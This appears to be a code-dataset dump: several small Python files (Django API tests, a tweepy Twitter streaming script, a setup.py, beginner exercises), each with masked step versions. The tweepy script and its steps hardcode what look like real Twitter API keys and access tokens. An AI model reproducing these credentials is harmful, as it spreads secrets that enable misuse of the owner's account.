checkpoint file found')\n return global_step\n\n\ndef main(argv=None):\n train()\n\nif __name__ == '__main__':\n tf.app.run()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
import json
from django.core.management import call_command
from django.http import JsonResponse
from django.test import TestCase
from django.urls import reverse
URLS = ['api_v1:categories', 'api_v1:main_categories', 'api_v1:articles']
class GetJsonData(TestCase):
def test_post_not_login_no_pk(self):
for url in URLS:
response = self.client.get(reverse(url))
self.check_redirect(response)
def check_redirect(self, response):
self.assertEqual(response.status_code, 200)
self.assertEqual(type(response), JsonResponse)
class UnLoginGetArticleJsonTestCase(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
call_command('loaddata', 'fixtures/auth.json', verbosity=0)
call_command('loaddata', 'fixtures/dump.json', verbosity=0)
def test_article_success_data(self):
url = reverse('api_v1:articles')
self.response = self.client.get(url)
data = json.loads(self.response.content)
self.assertTrue(len(data) >= 1)
self.assertIn('pk', data[0])
self.assertIn('title', data[0])
self.assertIn('description', data[0])
self.assertIn('category_id', data[0])
self.assertIn('user_id', data[0])
self.assertIn('image', data[0])
def test_get_main_category_json_data(self):
url = reverse('api_v1:main_categories')
self.response = self.client.get(url)
data = json.loads(self.response.content)
self.assertTrue(len(data) >= 1)
self.assertIn('pk', data[0])
self.assertIn('title', data[0])
def test_get_json_category_success_data(self):
url = reverse('api_v1:categories')
self.response = self.client.get(url)
data = json.loads(self.response.content)
self.assertTrue(len(data) >= 1)
self.assertIn('pk', data[0])
self.assertIn('title', data[0])
self.assertIn('parent_id', data[0])
|
normal
|
{
"blob_id": "676caabb103f67c631bc191b11ab0d2d8ab25d1e",
"index": 5803,
"step-1": "<mask token>\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-2": "<mask token>\n\n\nclass GetJsonData(TestCase):\n <mask token>\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-3": "<mask token>\n\n\nclass GetJsonData(TestCase):\n\n def test_post_not_login_no_pk(self):\n for url in URLS:\n response = self.client.get(reverse(url))\n self.check_redirect(response)\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-4": "<mask token>\nURLS = ['api_v1:categories', 'api_v1:main_categories', 'api_v1:articles']\n\n\nclass GetJsonData(TestCase):\n\n def test_post_not_login_no_pk(self):\n for url in URLS:\n response = self.client.get(reverse(url))\n self.check_redirect(response)\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-5": "import json\n\nfrom django.core.management import call_command\nfrom django.http import JsonResponse\nfrom django.test import TestCase\nfrom django.urls import reverse\n\n\nURLS = ['api_v1:categories', 'api_v1:main_categories', 'api_v1:articles']\n\n\nclass GetJsonData(TestCase):\n def test_post_not_login_no_pk(self):\n for url in URLS:\n response = self.client.get(reverse(url))\n self.check_redirect(response)\n\n def check_redirect(self, response):\n self.assertEqual(response.status_code, 200)\n self.assertEqual(type(response), JsonResponse)\n\n\nclass UnLoginGetArticleJsonTestCase(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n call_command('loaddata', 'fixtures/auth.json', verbosity=0)\n call_command('loaddata', 'fixtures/dump.json', verbosity=0)\n\n def test_article_success_data(self):\n url = reverse('api_v1:articles')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('description', data[0])\n self.assertIn('category_id', data[0])\n self.assertIn('user_id', data[0])\n self.assertIn('image', data[0])\n\n def test_get_main_category_json_data(self):\n url = reverse('api_v1:main_categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n\n def test_get_json_category_success_data(self):\n url = reverse('api_v1:categories')\n self.response = self.client.get(url)\n data = json.loads(self.response.content)\n self.assertTrue(len(data) >= 1)\n self.assertIn('pk', data[0])\n self.assertIn('title', data[0])\n self.assertIn('parent_id', data[0])\n",
"step-ids": [
5,
7,
8,
9,
11
]
}
|
[
5,
7,
8,
9,
11
] |
from slistener import SListener
from slistener import track
import datetime
import time, tweepy, sys
import json
import re
#def tweet_collector():
consumer_key='qpUR91PwjvChszV0VFgrc4Hje'
consumer_secret='q9mPUZE2OsFbaqKUF32ZsY1ry4anZ1k8pNSne56wc3HInmERFu'
access_token='2845943577-R0g6YRlrdEqSFb2mKy5HXuByQPdpq4TLGrPkmSs'
access_token_secret='ed5emUSxHENLtqN8nLYvGkbipKAEemFd0fgjsXNPC8GED'
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
listen = SListener(api)
stream = tweepy.Stream(auth, listen)
print "Streaming started..."
global track
try:
stream.filter(track = track)
except:
stream.disconnect()
|
normal
|
{
"blob_id": "606e40dd073c3efc95ef01a08466fd536a28f140",
"index": 324,
"step-1": "from slistener import SListener\nfrom slistener import track\nimport datetime\nimport time, tweepy, sys\nimport json\nimport re\n\n#def tweet_collector():\nconsumer_key='qpUR91PwjvChszV0VFgrc4Hje'\nconsumer_secret='q9mPUZE2OsFbaqKUF32ZsY1ry4anZ1k8pNSne56wc3HInmERFu'\naccess_token='2845943577-R0g6YRlrdEqSFb2mKy5HXuByQPdpq4TLGrPkmSs'\naccess_token_secret='ed5emUSxHENLtqN8nLYvGkbipKAEemFd0fgjsXNPC8GED'\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth) \n\nlisten = SListener(api)\nstream = tweepy.Stream(auth, listen)\nprint \"Streaming started...\"\nglobal track \ntry:\n stream.filter(track = track)\nexcept:\n stream.disconnect()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='SumoSound',
packages=['SumoSound'],
version='1.0.2',
license='MIT',
description='A python library to add 3D sound to a Sumo traffic simulation.',
long_description=long_description,
long_description_content_type='text/markdown',
author='Patrick Malcolm',
author_email='[email protected]',
url='https://github.com/patmalcolm91/SumoSound',
download_url='https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',
keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound', 'OpenAL', 'traffic'],
install_requires=[
'pyopenal',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
],
package_data={'SumoSound': ['stock_sounds/*.wav']}
)
|
normal
|
{
"blob_id": "81c9cabaa611f8e884708d535f0b99ff83ec1c0d",
"index": 8319,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='SumoSound', packages=['SumoSound'], version='1.0.2', license=\n 'MIT', description=\n 'A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description, long_description_content_type=\n 'text/markdown', author='Patrick Malcolm', author_email=\n '[email protected]', url=\n 'https://github.com/patmalcolm91/SumoSound', download_url=\n 'https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound',\n 'OpenAL', 'traffic'], install_requires=['pyopenal'], classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'], package_data={'SumoSound': [\n 'stock_sounds/*.wav']})\n",
"step-3": "<mask token>\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='SumoSound', packages=['SumoSound'], version='1.0.2', license=\n 'MIT', description=\n 'A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description, long_description_content_type=\n 'text/markdown', author='Patrick Malcolm', author_email=\n '[email protected]', url=\n 'https://github.com/patmalcolm91/SumoSound', download_url=\n 'https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound',\n 'OpenAL', 'traffic'], install_requires=['pyopenal'], classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'], package_data={'SumoSound': [\n 'stock_sounds/*.wav']})\n",
"step-4": "from setuptools import setup\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(name='SumoSound', packages=['SumoSound'], version='1.0.2', license=\n 'MIT', description=\n 'A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description, long_description_content_type=\n 'text/markdown', author='Patrick Malcolm', author_email=\n '[email protected]', url=\n 'https://github.com/patmalcolm91/SumoSound', download_url=\n 'https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound',\n 'OpenAL', 'traffic'], install_requires=['pyopenal'], classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'], package_data={'SumoSound': [\n 'stock_sounds/*.wav']})\n",
"step-5": "from setuptools import setup\nfrom os import path\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='SumoSound',\n packages=['SumoSound'],\n version='1.0.2',\n license='MIT',\n description='A python library to add 3D sound to a Sumo traffic simulation.',\n long_description=long_description,\n long_description_content_type='text/markdown',\n author='Patrick Malcolm',\n author_email='[email protected]',\n url='https://github.com/patmalcolm91/SumoSound',\n download_url='https://github.com/patmalcolm91/SumoSound/archive/v_1.0.2.tar.gz',\n keywords=['sumo', 'TraCI', 'sound', 'sound effects', '3D sound', 'OpenAL', 'traffic'],\n install_requires=[\n 'pyopenal',\n ],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8'\n ],\n package_data={'SumoSound': ['stock_sounds/*.wav']}\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#read file
my_file=open("file.txt","r")
#print(my_file.read())
#print(my_file.readline())
#print(my_file.read(3))#read 3 caracteres
"""
for line in my_file:
print(line)
my_file.close()
"""
print(my_file.readlines())#list
#close file
my_file.close()
#create new file and writing
new_file=open("newfile.txt",mode="w",encoding="utf-8")
for i in range (5) :
new_file.write("new line "+str(i+1)+"\n")
new_file.close()
#append
a=["new line 5\n","new line 6\n"]
new_file=open("newfile.txt",mode="a+",encoding="utf-8")
new_file.writelines(a)
new_file.close()
|
normal
|
{
"blob_id": "d44f8a2dee35d76c152695d49d73f74e9c25bfa9",
"index": 3015,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(my_file.readlines())\nmy_file.close()\n<mask token>\nfor i in range(5):\n new_file.write('new line ' + str(i + 1) + '\\n')\nnew_file.close()\n<mask token>\nnew_file.writelines(a)\nnew_file.close()\n",
"step-3": "my_file = open('file.txt', 'r')\n<mask token>\nprint(my_file.readlines())\nmy_file.close()\nnew_file = open('newfile.txt', mode='w', encoding='utf-8')\nfor i in range(5):\n new_file.write('new line ' + str(i + 1) + '\\n')\nnew_file.close()\na = ['new line 5\\n', 'new line 6\\n']\nnew_file = open('newfile.txt', mode='a+', encoding='utf-8')\nnew_file.writelines(a)\nnew_file.close()\n",
"step-4": "#read file\nmy_file=open(\"file.txt\",\"r\")\n#print(my_file.read())\n#print(my_file.readline())\n#print(my_file.read(3))#read 3 caracteres\n\"\"\"\nfor line in my_file:\n print(line)\nmy_file.close()\n\"\"\"\nprint(my_file.readlines())#list\n#close file\nmy_file.close()\n\n#create new file and writing\nnew_file=open(\"newfile.txt\",mode=\"w\",encoding=\"utf-8\")\nfor i in range (5) :\n new_file.write(\"new line \"+str(i+1)+\"\\n\")\nnew_file.close()\n#append\na=[\"new line 5\\n\",\"new line 6\\n\"]\nnew_file=open(\"newfile.txt\",mode=\"a+\",encoding=\"utf-8\")\nnew_file.writelines(a)\nnew_file.close()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from robotcar import RobotCar
import pdb
class RobotCar_Stub(RobotCar):
def forward(self):
print("Forward")
def backward(self):
print("Backward")
def left(self):
print("Left")
def right(self):
print("Right")
def stop(self):
print("Stop")
if __name__ == '__main__':
rc = RobotCar_Stub()
rc.move("fblrs")
|
normal
|
{
"blob_id": "09b2c1e69203f440754e82506b42e7856c94639a",
"index": 8623,
"step-1": "<mask token>\n\n\nclass RobotCar_Stub(RobotCar):\n <mask token>\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print('Forward')\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print('Forward')\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\nif __name__ == '__main__':\n rc = RobotCar_Stub()\n rc.move('fblrs')\n",
"step-4": "from robotcar import RobotCar\nimport pdb\n\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print('Forward')\n\n def backward(self):\n print('Backward')\n\n def left(self):\n print('Left')\n\n def right(self):\n print('Right')\n\n def stop(self):\n print('Stop')\n\n\nif __name__ == '__main__':\n rc = RobotCar_Stub()\n rc.move('fblrs')\n",
"step-5": "from robotcar import RobotCar\nimport pdb\n\nclass RobotCar_Stub(RobotCar):\n\n def forward(self):\n print(\"Forward\")\n \n def backward(self):\n print(\"Backward\")\n \n def left(self):\n print(\"Left\")\n \n def right(self):\n print(\"Right\")\n \n def stop(self):\n print(\"Stop\")\n\n\nif __name__ == '__main__':\n rc = RobotCar_Stub()\n rc.move(\"fblrs\")\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
def longest_word(s, d):
lengths = [(entry, len(entry)) for entry in d]
sorted_d = sorted(lengths, key = lambda x: (-x[1], x[0]))
for word, length in sorted_d:
j = 0
for i in range(0, len(s)):
if j < len(word) and word[j] == s[i]:
j += 1
if j == len(word):
return word
return ''
print(longest_word("abpcplea", ["a", "b", "c"]))
print(longest_word("abpcplea", ["ba", "ab", "a", "b"]))
print(longest_word('abpcplea', ["ale","apple","monkey","plea"]))
|
normal
|
{
"blob_id": "86de5b4a72978e2c49e060eefc513e3ed61272ae",
"index": 4004,
"step-1": "<mask token>\n",
"step-2": "def longest_word(s, d):\n lengths = [(entry, len(entry)) for entry in d]\n sorted_d = sorted(lengths, key=lambda x: (-x[1], x[0]))\n for word, length in sorted_d:\n j = 0\n for i in range(0, len(s)):\n if j < len(word) and word[j] == s[i]:\n j += 1\n if j == len(word):\n return word\n return ''\n\n\n<mask token>\n",
"step-3": "def longest_word(s, d):\n lengths = [(entry, len(entry)) for entry in d]\n sorted_d = sorted(lengths, key=lambda x: (-x[1], x[0]))\n for word, length in sorted_d:\n j = 0\n for i in range(0, len(s)):\n if j < len(word) and word[j] == s[i]:\n j += 1\n if j == len(word):\n return word\n return ''\n\n\nprint(longest_word('abpcplea', ['a', 'b', 'c']))\nprint(longest_word('abpcplea', ['ba', 'ab', 'a', 'b']))\nprint(longest_word('abpcplea', ['ale', 'apple', 'monkey', 'plea']))\n",
"step-4": "def longest_word(s, d):\n lengths = [(entry, len(entry)) for entry in d]\n sorted_d = sorted(lengths, key = lambda x: (-x[1], x[0]))\n\n for word, length in sorted_d:\n j = 0\n for i in range(0, len(s)):\n if j < len(word) and word[j] == s[i]:\n j += 1\n if j == len(word):\n return word\n return ''\n\nprint(longest_word(\"abpcplea\", [\"a\", \"b\", \"c\"]))\nprint(longest_word(\"abpcplea\", [\"ba\", \"ab\", \"a\", \"b\"]))\nprint(longest_word('abpcplea', [\"ale\",\"apple\",\"monkey\",\"plea\"]))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import requests
import json
data = json.load(open("dummy_data/data.json"))
for one in data:
print(one)
r = requests.post("http://localhost:8080/sumari", json=one)
print(r.text)
|
normal
|
{
"blob_id": "8bc40ed4fe1091ecdb40cd55ff9cf53010078823",
"index": 361,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor one in data:\n print(one)\n r = requests.post('http://localhost:8080/sumari', json=one)\n print(r.text)\n",
"step-3": "<mask token>\ndata = json.load(open('dummy_data/data.json'))\nfor one in data:\n print(one)\n r = requests.post('http://localhost:8080/sumari', json=one)\n print(r.text)\n",
"step-4": "import requests\nimport json\ndata = json.load(open('dummy_data/data.json'))\nfor one in data:\n print(one)\n r = requests.post('http://localhost:8080/sumari', json=one)\n print(r.text)\n",
"step-5": "import requests\nimport json\n\ndata = json.load(open(\"dummy_data/data.json\"))\n\nfor one in data:\n print(one)\n r = requests.post(\"http://localhost:8080/sumari\", json=one)\n print(r.text)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Exercise 3 from the Python tutorial Part 1 on:
https://codeandwork.github.io/courses/prep/pythonTutorial1.html
"""
import math
print("Give the length of each side in order to compute the area of a triangle.")
lenA = float(input("Give the length of side A:"))
lenB = float(input("Give the length of side B:"))
lenC = float(input("Give the length of side C:"))
triangleArea = (1/4) * math.sqrt((lenA+lenB+lenC) * (-lenA+lenB+lenC) * (lenA-lenB+lenC) * (lenA+lenB-lenC))
print("The triangle area is:", triangleArea)
|
normal
|
{
"blob_id": "398cb05218a9772a0b62fdfbacc465b26427827d",
"index": 2854,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n 'Give the length of each side in order to compute the area of a triangle.')\n<mask token>\nprint('The triangle area is:', triangleArea)\n",
"step-3": "<mask token>\nprint(\n 'Give the length of each side in order to compute the area of a triangle.')\nlenA = float(input('Give the length of side A:'))\nlenB = float(input('Give the length of side B:'))\nlenC = float(input('Give the length of side C:'))\ntriangleArea = 1 / 4 * math.sqrt((lenA + lenB + lenC) * (-lenA + lenB +\n lenC) * (lenA - lenB + lenC) * (lenA + lenB - lenC))\nprint('The triangle area is:', triangleArea)\n",
"step-4": "<mask token>\nimport math\nprint(\n 'Give the length of each side in order to compute the area of a triangle.')\nlenA = float(input('Give the length of side A:'))\nlenB = float(input('Give the length of side B:'))\nlenC = float(input('Give the length of side C:'))\ntriangleArea = 1 / 4 * math.sqrt((lenA + lenB + lenC) * (-lenA + lenB +\n lenC) * (lenA - lenB + lenC) * (lenA + lenB - lenC))\nprint('The triangle area is:', triangleArea)\n",
"step-5": "\"\"\"\n Exercise 3 from the Python tutorial Part 1 on:\n https://codeandwork.github.io/courses/prep/pythonTutorial1.html\n\"\"\"\n\nimport math\n\nprint(\"Give the length of each side in order to compute the area of a triangle.\")\nlenA = float(input(\"Give the length of side A:\"))\nlenB = float(input(\"Give the length of side B:\"))\nlenC = float(input(\"Give the length of side C:\"))\n\ntriangleArea = (1/4) * math.sqrt((lenA+lenB+lenC) * (-lenA+lenB+lenC) * (lenA-lenB+lenC) * (lenA+lenB-lenC))\n\nprint(\"The triangle area is:\", triangleArea)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
n=int(input().strip())
a=list(input().strip().split(' '))
H=list(input().strip().split(' '))
a = [int(i) for i in a]
m=int(H[0])
hmin=int(H[1])
hmax=int(H[2])
pos=0
found = 0
d=a[-1]-a[0]
if(d==m):
print(a[0])
elif(0<d<m):
for i in range(hmin, hmax+1):
fin1 = a[0]-i+m
if(hmin<=fin1-a[-1]<=hmax or fin1==a[-1]):
print(a[0]-i)
found = 1
break
if(found == 0):
i = 0
while(i<(n-1)):
found = 0
invalid = 0
d = a[i+1]-a[i]
print(a[i], a[i+1], d)
if(d<hmin or d>hmax):
i=i+1
continue
for j in range(i+1, n):
d = a[j]-a[j-1]
print(a[i], a[j], d)
if(d<hmin or d>hmax):
i = j-1
invalid = 1
break
if(a[j]-a[i]>m):
invalid = 1
break
if(a[j]-a[i]==m):
found = 1
invalid = 0
break
if(invalid == 1):
i = i+1
continue
if(found == 1 or (a[-1]-a[i]+hmin<=m and a[-1]-a[i]+hmax>=m)):
print(a[i])
break
i = i+1
if(n == 1):
print(a[0]+hmax-m)
|
normal
|
{
"blob_id": "3da82bcff0a4f91c1245892bc01e9f743ea354a8",
"index": 4484,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif d == m:\n print(a[0])\nelif 0 < d < m:\n for i in range(hmin, hmax + 1):\n fin1 = a[0] - i + m\n if hmin <= fin1 - a[-1] <= hmax or fin1 == a[-1]:\n print(a[0] - i)\n found = 1\n break\nif found == 0:\n i = 0\n while i < n - 1:\n found = 0\n invalid = 0\n d = a[i + 1] - a[i]\n print(a[i], a[i + 1], d)\n if d < hmin or d > hmax:\n i = i + 1\n continue\n for j in range(i + 1, n):\n d = a[j] - a[j - 1]\n print(a[i], a[j], d)\n if d < hmin or d > hmax:\n i = j - 1\n invalid = 1\n break\n if a[j] - a[i] > m:\n invalid = 1\n break\n if a[j] - a[i] == m:\n found = 1\n invalid = 0\n break\n if invalid == 1:\n i = i + 1\n continue\n if found == 1 or a[-1] - a[i] + hmin <= m and a[-1] - a[i] + hmax >= m:\n print(a[i])\n break\n i = i + 1\nif n == 1:\n print(a[0] + hmax - m)\n",
"step-3": "<mask token>\nn = int(input().strip())\na = list(input().strip().split(' '))\nH = list(input().strip().split(' '))\na = [int(i) for i in a]\nm = int(H[0])\nhmin = int(H[1])\nhmax = int(H[2])\npos = 0\nfound = 0\nd = a[-1] - a[0]\nif d == m:\n print(a[0])\nelif 0 < d < m:\n for i in range(hmin, hmax + 1):\n fin1 = a[0] - i + m\n if hmin <= fin1 - a[-1] <= hmax or fin1 == a[-1]:\n print(a[0] - i)\n found = 1\n break\nif found == 0:\n i = 0\n while i < n - 1:\n found = 0\n invalid = 0\n d = a[i + 1] - a[i]\n print(a[i], a[i + 1], d)\n if d < hmin or d > hmax:\n i = i + 1\n continue\n for j in range(i + 1, n):\n d = a[j] - a[j - 1]\n print(a[i], a[j], d)\n if d < hmin or d > hmax:\n i = j - 1\n invalid = 1\n break\n if a[j] - a[i] > m:\n invalid = 1\n break\n if a[j] - a[i] == m:\n found = 1\n invalid = 0\n break\n if invalid == 1:\n i = i + 1\n continue\n if found == 1 or a[-1] - a[i] + hmin <= m and a[-1] - a[i] + hmax >= m:\n print(a[i])\n break\n i = i + 1\nif n == 1:\n print(a[0] + hmax - m)\n",
